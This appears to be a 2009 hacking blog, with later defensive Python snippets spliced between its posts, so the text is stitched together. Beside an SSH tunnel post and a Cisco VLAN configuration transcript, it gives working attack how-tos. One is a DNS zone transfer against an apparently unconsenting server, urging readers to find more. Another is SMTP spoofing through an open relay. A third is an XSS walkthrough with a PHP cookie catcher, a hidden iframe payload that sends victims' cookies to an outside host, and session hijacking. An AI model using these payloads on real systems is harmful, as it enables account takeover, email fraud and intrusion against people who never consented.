Tuesday, December 29, 2009

SSH Tunnel

I figured I would do a quick post on SSH tunnels. I will be tunneling to the wcosug server using PuTTY. I configure the tunnel in PuTTY as shown:
[screenshot: PuTTY tunnel configuration]
Then I configure my web browser to use it as a proxy.
[screenshot: browser proxy configuration]
And voilà, an SSH tunnel. In the future I will go into more detail about using it as, say, an RDP tunnel, etc.

Wednesday, December 23, 2009

Cisco DTP Hack

Well, unfortunately I wasn't able to get this to work. I will try again over Christmas; I was not able to pick up any DTP packets. I'm going to have to do more research on it.

Tuesday, December 22, 2009

Configure Cisco Router

Well, this is going to be a two-part hack. I configured a Cisco switch with 3 different VLANs; I'll be using 2 of them. Please look at the config for any questions. This is on a Catalyst 3500 XL switch.

Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]: no
Press RETURN to get started.


Switch>en
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int
% Incomplete command.

Switch(config)#
Switch(config)#interface ?
FastEthernet FastEthernet IEEE 802.3
GigabitEthernet GigabitEthernet IEEE 802.3z
Multilink Multilink-group interface
Port-channel Ethernet Channel of interfaces
VLAN Switch VLAN Virtual Interface
Virtual-TokenRing Virtual TokenRing

Switch(config)#interface
% Incomplete command.

Switch(config)#interface Fast
Switch(config)#interface FastEthernet0/1
Switch(config-if)#?
Interface configuration commands:
arp Set arp type (arpa, probe, snap) or timeout
bandwidth Set bandwidth informational parameter
carrier-delay Specify delay for interface transitions
cdp CDP interface subcommands
custom-queue-list Assign a custom queue list to an interface
default Set a command to its defaults
delay Specify interface throughput delay
description Interface specific description
duplex Configure duplex operation.
exit Exit from interface configuration mode
fair-queue Enable Fai
help Description of the interactive help system
hold-queue Set hold queue depth
keepalive Enable keepalive
load-interval Specify interval for load calculation for an interface
logging Configure logging for interface
loopback Configure internal loopback on an interface
mac-address Manually set interface MAC address
max-reserved-bandwidth Maximum Reservable Bandwidth on an
media-type Interface media type
mtu Set the interface Maximum Transmission Unit (MTU)
mvr MVR per port configuration
negotiation Select Autonegotiation mode
no Negate a command or set its defaults
port Perform switch port configuration
power power configuration
priority-group Assign a priority group to an interface
random-detect Enable Weighted Random Ea
Interface
rmon Configure Remote Monitoring on an interface
service-policy Configure QoS Service Policy
shutdown Shutdown the selected interface
snmp Modify SNMP interface parameters
spanning-tree Spanning Tree Subsystem
speed Configure speed operation.
switchport Set switching mode characteristics
timeout Define timeout values for this interface
transmit-interface Assign a transmit interface to a receive-only interface
tx-queue-limit Configure card level transmit queue limit
udld Configure UDLD enabled or disabled and ignore global UDLD setting

Switch(config-if)#^Z
Switch#
00:13:29: %SYS-5-CONFIG_I: Configured from console by consoleshow vtp status
VTP Version : 2
Configuration Revision : 0
Maximum VLANs supported locally : 254
Number of existing VLANs : 5
VTP Operating Mode : Server
VTP Domain Name :
VTP Pruning Mode : Disabled
VTP V2 Mode : Disabled
VTP Traps Generation : Disabled
MD5 digest : 0xBF 0x86 0x94 0x45 0xFC 0xDF 0xB5 0x70
Configuration last modified by 0.0.0.0 at 0-0-00 00:00:00
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- --------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/5, Fa0/6, Fa0/7, Fa0/8,
Fa0/9, Fa0/10, Fa0/11, Fa0/12,
Fa0/13, Fa0/14, Fa0/15, Fa0/16,
Fa0/17, Fa0/18, Fa0/19, Fa0/20,
Fa0/21, Fa0/22, Fa0/23, Fa0/24,

1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 2 name test
VLAN 2 added:
Name: test
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/5, Fa0/6, Fa0/7, Fa0/8,
Fa0/9, Fa0/10, Fa0/11, Fa0/12,
Fa0/13, Fa0/14, Fa0/15, Fa0/16,
Fa0/17, Fa0/18, Fa0/19, Fa0/20,
Fa0/21, Fa0/22, Fa0/23, Fa0/24,

2 test active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
2 enet 100002 1500 - - - -
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 3 name test2
VLAN 3 added:
Name: test2
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int vlan2
Switch(config-subif)#management
Switch(config-subif)#
Switch#
00:19:43: %SYS-5-CONFIG_I: Configured from console by consoleconfig t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int fa
Switch(config)#int fastEthernet 0/5
Switch(config-if)#switchport access vlan2
^
% Invalid input detected at '^' marker.

Switch(config-if)#switchport access vlan 2
Switch(confi
Switch(config)#inter
Switch(config)#interface fast
Switch(config)#interface fastEthernet 0/6
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/7
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/10
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/11
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEther
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#end
Switch#write
00:23:15: %SYS-5-CONFIG_I: Configured from console by console memorey
^
% Invalid input detected at '^' marker.

Switch#write memory
Building configuration...
[OK]
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/8, Fa0/9, Fa0/13, Fa0/14,
Fa0/15, Fa0/16, Fa0/17, Fa0/18,
Fa0/19, Fa0/20, Fa0/21, Fa0/22,
Fa0/23, Fa0/24, Gi0/1, Gi0/2
2 test active Fa0/5, Fa0/6, Fa0/7
3 test2 active Fa0/10, Fa0/11, Fa0/12
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch#
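As an added defender-side check (not part of the original post), here is a Python parser for the show vlan output above. It maps each VLAN to its ports and flags everything still sitting in the default VLAN 1, which is where unused ports stay unless they are moved to a dedicated unused VLAN and shut down. The sample is a copy of the final show vlan output above with the leading whitespace IOS prints on continuation lines restored.

```python
import re
from collections import OrderedDict

# Copy of the final "show vlan" from the post, continuation-line indentation restored.
SHOW_VLAN = """\
VLAN Name                             Status    Ports
---- -------------------------------- --------- -------------------------------
1    default                          active    Fa0/1, Fa0/2, Fa0/3, Fa0/4,
                                                Fa0/8, Fa0/9, Fa0/13, Fa0/14,
                                                Fa0/15, Fa0/16, Fa0/17, Fa0/18,
                                                Fa0/19, Fa0/20, Fa0/21, Fa0/22,
                                                Fa0/23, Fa0/24, Gi0/1, Gi0/2
2    test                             active    Fa0/5, Fa0/6, Fa0/7
3    test2                            active    Fa0/10, Fa0/11, Fa0/12
1002 fddi-default                     active
1003 token-ring-default               active
1004 fddinet-default                  active
1005 trnet-default                    active

VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
"""

VLAN_ROW = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s*(.*)$")   # id name status [ports]
PORT = re.compile(r"^(?:Fa|Gi)\d+/\d+$")


def _ports(chunk):
    """Split a comma-separated port list, keeping only real port names."""
    toks = [t.strip() for t in chunk.split(",") if t.strip()]
    return [t for t in toks if PORT.match(t)]


def parse_show_vlan(text):
    """Return {vlan_id: {"name": ..., "status": ..., "ports": [...]}} from the first table."""
    vlans = OrderedDict()
    current = None
    for line in text.splitlines():
        if line.startswith("VLAN Type"):        # second table (SAID/MTU) begins: stop
            break
        m = VLAN_ROW.match(line)
        if m:                                   # row starting with a VLAN id
            vid, name, status, ports = m.groups()
            current = vlans.setdefault(int(vid), {"name": name, "status": status, "ports": []})
            current["ports"] += _ports(ports)
        elif current and line.strip():          # indented continuation of the port list
            current["ports"] += _ports(line)
    return vlans


def ports_in_default_vlan(vlans):
    """Ports left in VLAN 1: review each, move unused ones to a parking VLAN and shut them down."""
    return vlans.get(1, {"ports": []})["ports"]
```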

Monday, December 21, 2009

DNS Zone Transfer

A DNS zone transfer is when a DNS server is incorrectly configured to allow anyone to ask for the full DNS record list of a domain. I wanted to find a specific example of a zone transfer that had internal IPs in it; after nmapping ranges for port 53, I found one. Now, you need to know the domain name in order to do the transfer, and not a lot of hosts have reverse DNS, so I got lucky finding one that had both port 53 and port 25 open. To find the name I telnet to port 25 and send a HELO; on this one I did not even need to send a HELO:

C:\Users\Syrus>telnet **.192.22.105 25
220 rack1.*********.com ESMTP Postfix

Now, to do the zone transfer, the syntax is: host -l <domain name> <IP address or DNS name of the DNS server>

bt ~ # host -l *********.com **.192.22.105
Using domain server:
Name: **.192.22.105
Address: **.192.22.105#53
Aliases:
*********.com has address **.192.22.105
*********.com name server ns1.*********.com.
internal.*********.com has address 192.168.60.254
internal2.*********.com has address 192.168.60.254
isc.*********.com has address **.203.105.185
isc-pi.*********.com has address **.203.105.185
mail.*********.com has address **.192.22.105
new.*********.com has address **.192.22.105
ns1.*********.com has address **.192.22.105
ns2.*********.com has address **.192.22.106
rack1.*********.com has address **.192.22.105
rack2.*********.com has address **.192.22.106
rack3.*********.com has address **.192.22.107
rack4.*********.com has address **.192.22.108
rack5.*********.com has address **.192.22.109
smtp.*********.com has address **.192.22.105

Now you have a good network map with some internal IPs. Go find some more that are vulnerable to zone transfers.
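As an added example (not from the original post), here is a small Python check a zone owner can run over their own host -l output: it collects every address record and flags names that resolve to RFC 1918 or IPv6 ULA space, which have no business in a public zone. The sample transfer is constructed in the same format as above, with 203.0.113.0/24 (TEST-NET-3) standing in for the masked public addresses and example.com for the masked domain.

```python
import ipaddress
import re

# Constructed sample in "host -l" format; TEST-NET-3 stands in for the masked public IPs.
TRANSFER = """\
Using domain server:
Name: 203.0.113.5
Address: 203.0.113.5#53
Aliases:
example.com has address 203.0.113.5
example.com name server ns1.example.com.
internal.example.com has address 192.168.60.254
internal2.example.com has address 192.168.60.254
mail.example.com has address 203.0.113.5
ns2.example.com has address 203.0.113.6
vpn.example.com has IPv6 address fd00::1
"""

A_RECORD = re.compile(r"^(\S+) has (?:IPv6 )?address (\S+)$")

# Address space that should only ever appear in an internal view of the zone.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]


def parse_transfer(text):
    """Return [(name, ip)] for every A/AAAA line in host -l output."""
    records = []
    for line in text.splitlines():
        m = A_RECORD.match(line.strip())
        if m:
            records.append((m.group(1), ipaddress.ip_address(m.group(2))))
    return records


def is_internal(ip):
    """True for RFC 1918 / ULA addresses (version mismatch with a network is just False)."""
    return any(ip in net for net in INTERNAL_NETS)


def leaked_internal_hosts(records):
    """Names whose public record points at internal space: topology leaked by the zone."""
    return sorted({name for name, ip in records if is_internal(ip)})

# Server-side fix: restrict AXFR to your secondaries (BIND: allow-transfer { <secondary IPs>; };)
# and keep internal names in an internal-only view rather than the public zone.
```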

SMTP Spoofing

This is an old exploit, I guess you would call it. It is not in wide use anymore, but I was playing with it over the weekend and figured I would post it.

C:\Users\Syrus>telnet mail.*******.com 2525

220 smtp.*******.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready
at Mon, 21 Dec 2009 09:49:36 -0500
HELO
250 smtp.*******.com Hello [10.10.10.100]
MAIL FROM: user@*******.com
250 2.1.0 user@*******.com....Sender OK
RCPT TO: *******@gmail.com
250 2.1.5 *******@gmail.com
DATA
354 Start mail input; end with .
Here is my email message.

.
250 2.6.0 Queued mail for delivery

And voilà, an email sent from that address with no password or anything. Very useful!
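As an added example (not part of the post), this is the check the server above was missing, in Python: a relay decision that accepts a recipient only if it is local, or the client authenticated, or the client is on a trusted network, applied to the facts pulled out of a transcript. The session is a constructed copy of the one above with the masked domain replaced by example.com; LOCAL_DOMAINS and TRUSTED_NETS are placeholders for your own values.

```python
import ipaddress
import re

LOCAL_DOMAINS = {"example.com"}                          # domains this server delivers for
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24")]    # placeholder: nets allowed to relay without AUTH

# Constructed copy of the session in the post, masked domain replaced by example.com.
SESSION = """\
220 smtp.example.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Mon, 21 Dec 2009 09:49:36 -0500
HELO
250 smtp.example.com Hello [10.10.10.100]
MAIL FROM: user@example.com
250 2.1.0 user@example.com....Sender OK
RCPT TO: someone@gmail.com
250 2.1.5 someone@gmail.com
DATA
354 Start mail input; end with .
"""


def parse_session(text):
    """Pull the facts a relay decision needs out of a raw SMTP transcript."""
    s = {"client_ip": None, "mail_from": None, "rcpt_to": [], "authenticated": False}
    for line in text.splitlines():
        hello = re.match(r"250 \S+ Hello \[([\d.]+)\]", line)
        if hello:
            s["client_ip"] = hello.group(1)
        elif line.upper().startswith("MAIL FROM:"):
            s["mail_from"] = line.split(":", 1)[1].strip(" <>")
        elif line.upper().startswith("RCPT TO:"):
            s["rcpt_to"].append(line.split(":", 1)[1].strip(" <>"))
        elif line.startswith("235 "):                      # 235 = AUTH succeeded
            s["authenticated"] = True
    return s


def relay_allowed(rcpt, client_ip, authenticated):
    """Local recipients always; foreign recipients only from authenticated or trusted clients."""
    if rcpt.rsplit("@", 1)[-1].lower() in LOCAL_DOMAINS:
        return True, "local recipient"
    if authenticated:
        return True, "authenticated client"
    if client_ip and any(ipaddress.ip_address(client_ip) in n for n in TRUSTED_NETS):
        return True, "trusted network"
    return False, "554 5.7.1 relay access denied"


def audit(session):
    """Recipients the server accepted that a correctly configured relay would have refused."""
    return [r for r in session["rcpt_to"]
            if not relay_allowed(r, session["client_ip"], session["authenticated"])[0]]
```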

XSS

Well, I was testing my friend's site for vulnerabilities and found it was vulnerable to cross-site scripting. The environment was a PHP forum. The first thing I needed to do was see whether the forum allowed a user to run scripts; to do this I made a new thread with the script
< script> alert("Do you work")</script>
in it. And well, it worked! So the next step was to see if it was cookie based, so in the URL I put
javascript:alert(document.cookie)
and I got an alert with my cookies in it. So it's starting to look real good. Now you need a cookie catcher. It's a simple PHP script:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date and Time: ' .$date. '< br > Referer: '.$referer.'< br > < br > < br >');
fclose($fp);
header ("Location: http://www.*******.com");
?>
So upload your PHP script to a web host that supports PHP. I used t35. Now you are going to make an iframe. You want it as small as possible so it is not seen, so I set height, width, and border to 0. You also want to set the document location to the location of your cookie catcher:
< iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://********.t35.com/cookie.php?c="+document.cookie) </iframe >

Now when a logged-in user browses to your thread, you will catch their cookies in a file called cookies.html. Here is what the cookies I caught from my friend's site looked like:
PHPSESSID=dqecpehg45ah5431f1q12p4pd1
So now you have someone's cookies; what do you do? Well, first make sure you are logged out of the site. Then you inject their cookies into your browser by typing the following in the URL bar:
javascript:void(document.cookie="PHPSESSID=dqecpehg45ah5431f1q12p4pd1")
Hit enter, then refresh, and you should be logged in as the user. One reason this would not work is if the session is IP-bound, meaning you need to come from a certain IP in order to use those cookies.
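As an added example (not the forum's code), here is the server-side fix in Python rather than PHP: escape every post on output so <script> and <iframe> land in the page as text, re-allow only a tiny BBCode subset on top of that, and refuse javascript: URLs, which both payloads above depend on. The Set-Cookie helper shows the HttpOnly flag that keeps document.cookie from ever exposing PHPSESSID to page script; the BBCode tags and cookie attributes are my assumptions, not the forum's.

```python
import html
import re
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https"}


def safe_url(url):
    """Return url only if its scheme is allowed; javascript:, data:, etc. become '#'."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return url if scheme in SAFE_SCHEMES else "#"


def render_post(body):
    """Escape everything first, then re-introduce only [b]..[/b] and [url=..]..[/url]."""
    out = html.escape(body, quote=True)             # <, >, &, ", ' -> entities
    out = re.sub(r"\[b\](.*?)\[/b\]", r"<b>\1</b>", out, flags=re.S)

    def link(m):
        # The URL was escaped above; unescape, validate the scheme, escape again for the attribute.
        href = html.escape(safe_url(html.unescape(m.group(1))), quote=True)
        return '<a href="%s" rel="nofollow">%s</a>' % (href, m.group(2))

    return re.sub(r"\[url=([^\]]+)\](.*?)\[/url\]", link, out, flags=re.S)


def session_cookie(sid):
    """Set-Cookie value: HttpOnly hides it from document.cookie, Secure restricts it to TLS."""
    return "PHPSESSID=%s; Path=/; HttpOnly; Secure; SameSite=Lax" % sid
```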

It's been a while

Well, it has been a while. I hope to be able to do weekly updates; today I will hopefully get some new exploits up. I saw I have some comments; I will try to respond to them today as well. Thanks for all the support!